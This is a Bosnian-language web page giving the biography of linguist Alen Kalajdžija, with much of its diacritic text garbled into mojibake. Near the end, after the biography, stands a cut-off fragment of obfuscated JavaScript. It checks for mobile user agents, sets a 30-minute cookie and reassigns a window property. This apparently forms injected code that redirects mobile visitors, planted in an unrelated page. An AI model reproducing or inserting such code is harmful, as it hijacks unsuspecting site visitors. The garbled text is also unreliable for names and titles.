BIOGRAFIJA DR.SC ALEN KALAJDZIJA, DIREKTOR INSTITUTA ZA JEZIK.

Alen Kalajdzija

Dr. sc. Alen KalajdA?ija, direktor

StruA?ne oblasti: historija jezika

Alen KalajdA?ija, roAi??en je 31. 12. 1977. godine u Sarajevu. Nakon osnovnoA?kolskog obrazovanja u Sarajevu i srednjoA?kolskog u ZagrebaA?koj medresi ai??zDr. Ahmed SmailoviAi??ai???, 1997. godine upisuje se na Filozofski fakultet Univerziteta u Sarajevu, gdje diplomira 2002. godine na Odsjeku za bosanski, hrvatski i srpski jezik i knjiA?evnost. Godine 2003. upisuje se na Postdiplomski studij iz lingvistike na Filozofskom fakultetu u Sarajevu, gdje je 2007. magistrirao na temi pod naslovom Razvoj refleksa glasa jata i formiranje poetskoga ikavskog manira, a zvanje doktora nauka stekao je 2013. godine.

Na Fakultetu humanistiA?kih nauka Univerziteta ai??zDA?emal BijediAi??ai??? u Mostaru radio je od akademske 2002/2003. godine U periodu 2003ai??i??2011. recenzirao je preko 30 udA?benika za osnovnu i srednju A?kolu za predmet Bosanski jezik i knjiA?evnost. Imao je nekoliko meAi??unarodnih struA?nih usavrA?avanja u NjemaA?koj (WA?rzburg, Erlangen). U akademskoj 2007/2008. godini angaA?iran je na Trakijskom univerzitetu u Republici Turskoj na Katedri za bosanski jezik, gdje je bio izabran u zvanju asistenta. Obavljao je viA?e godina funkciju sekretara A?asopisa Fakulteta humanistiA?kih nauka IstraA?ivanja. U koautorstvu s Munirom DrkiAi??em u Mostaru je 2010. godine izdao knjigu Omer Humo: Sehletul-vusul. Godine 2013. u Institutu za jezik u Sarajevu objavio je autorsku knjigu pod naslovom Refleksi jata u bosanskom alhamijado pjesniA?tvu. Ikavski poetski manir.

Dosada je objavio preko 50 radova, ukljuA?ujuAi??i izvorne nauA?ne A?lanke, struA?ne radove i prikaze. Radove i A?lanke objavljivao je u A?asopisima: Pismo, IstraA?ivanja, GodiA?njak BZK Preporod, Bosnian studies, KnjiA?evni jezik, DidaktiA?ki putokazi, Anali Gazi Husrev-begove biblioteke, Prilozi za orijentalnu filologiju, Slovo GorA?ina, Behar, Novi Izraz, Znakovi vremena i dr. Sudjelovao je na 15 domaAi??ih i meAi??unarodnih nauA?nih konferencija, simpozija i okruglih stolova. ViA?e puta bio je promotor razliA?itih izdanja iz oblasti bosnistike. Jedan je od struA?nih saradnika pri izradi RjeA?nika bosanskog jezika autora DA?evada JahiAi??a. Godine 2012. izabran je za viA?eg struA?nog saradnika u Institutu za jezik u Sarajevu, a iste godine uspjeA?no je odbranio doktorsku disertaciju na Filozofskom fakultetu u Sarajevu pod naslovom JeziA?ki izraz HAi??rmannove zbirke usmene epike u odnsou na novoA?tokavsku folklornu koine. Godine 2013. izabran je u zvanje nauA?nog saradnika u Institutu za jezik u Sarajevu. Direktor je Instituta za jezik u Sarajevu.

Informacije

Uvazeni doktor govorit ce o historiji bosanskog jezika.

si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Leave a Comment